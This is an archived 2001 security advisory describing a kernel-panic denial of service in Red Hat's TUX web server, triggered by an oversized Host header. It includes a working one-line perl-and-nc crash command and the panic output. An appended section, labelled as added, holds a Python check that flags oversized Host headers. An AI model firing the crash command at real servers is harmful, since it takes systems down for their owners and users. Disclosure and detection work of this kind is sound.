RH Linux Tux HTTPD DoS


Date: Mon, 5 Nov 2001 12:57:15 -0000
From: Aiden ORawe <[email protected]>
To: [email protected]
Subject: RH Linux Tux HTTPD DoS


TUX HTTPD Denial of Service Condition

Background:
-------------
Tux is a Kernel-Space HTTP server coded for optimal performance (IRQ
Affinity, HTTP compression, direct scatter-gather DMA etc.) It is meant to
be used as the main HTTP server for static objects with requests for
dynamic content being passed to a user-space HTTPD server such as Apache
on the same box when necessary. Tux is disabled by default.

Vulnerability:
--------------
It is possible to cause a denial of service condition by submitting an
oversized "Host:" header request to the Tux daemon, causing an assertion
failure and eventual Kernel Panic. A total system reboot is required to
return full functionality.

For example the following script will cause the target box to crash:

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc <ip address> <dest_port>

The following output will then be generated (edited for brevity):

Code: Bad EIP Value.
(0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!

To the best of my knowledge this is *not* a buffer overflow (despite
apparently being able to overwrite the contents of the EIP register) and
as such cannot be utilised to run arbitrary code.

FYI The Tux source code contains numerous assertions that are used to
safeguard data integrity and if any of these assertions fail (as it does
in this case) code execution is halted by making a call to the BUG()
function.

System(s) tested:
-----------------
RedHat Linux 7.2, Kernel 2.4.7-10 and 2.4.9-7 running TUX-2.1.0-2.

Additional Notes:
-----------------
[email protected] were advised of this issue 25 October 2001.

Solution:
---------
See Security Advisory - RHSA-2001:142-15
http://www.redhat.com/support/errata/RHSA-2001-142.html

Thanks:
-------
Michael K. Johnston
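
A defensive check for the condition described in the advisory above, added here as an example; it is not part of the original post and is not TUX or Red Hat code. It classifies a raw HTTP request by its "Host:" header so that a front-end filter or log review can flag oversized values; the function name and the length limit (DNS name limit plus an optional port) are assumptions chosen for illustration.

```python
# Added example: flag HTTP requests whose Host header exceeds a sane length.
# MAX_HOST_LEN is an assumed policy value, not taken from the advisory.
MAX_HOST_LEN = 255 + len(":65535")   # DNS name limit plus an optional port


def host_header_verdict(raw: bytes, max_len: int = MAX_HOST_LEN) -> str:
    """Return 'ok', 'missing', 'duplicate' or 'oversized' for one raw request."""
    # Only look at the header block; accept both CRLF and bare LF line endings,
    # since the request in the advisory uses bare "\n".
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    lines = head.split(b"\n")[1:]          # skip the request line
    hosts = []
    for line in lines:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            hosts.append(value.strip())
    if not hosts:
        return "missing"
    if any(len(h) > max_len for h in hosts):
        return "oversized"
    if len(hosts) > 1:
        return "duplicate"
    return "ok"


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"GET / HTTP/1.0\r\nAccept: */*\r\nHost: www.example.com\r\n\r\n",
    "long_host": b"GET / HTTP/1.0\nAccept: */*\nHost: " + b"A" * 6000 + b"\n",
    "no_host": b"GET / HTTP/1.0\r\nAccept: */*\r\n\r\n",
    "two_hosts": b"GET / HTTP/1.1\r\nHost: a.example\r\nhost: b.example\r\n\r\n",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(f"{label:10s} -> {host_header_verdict(request)}")
```

A check like this only reduces exposure in front of an unpatched server; the fix for TUX itself is the erratum referenced in the Solution section.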

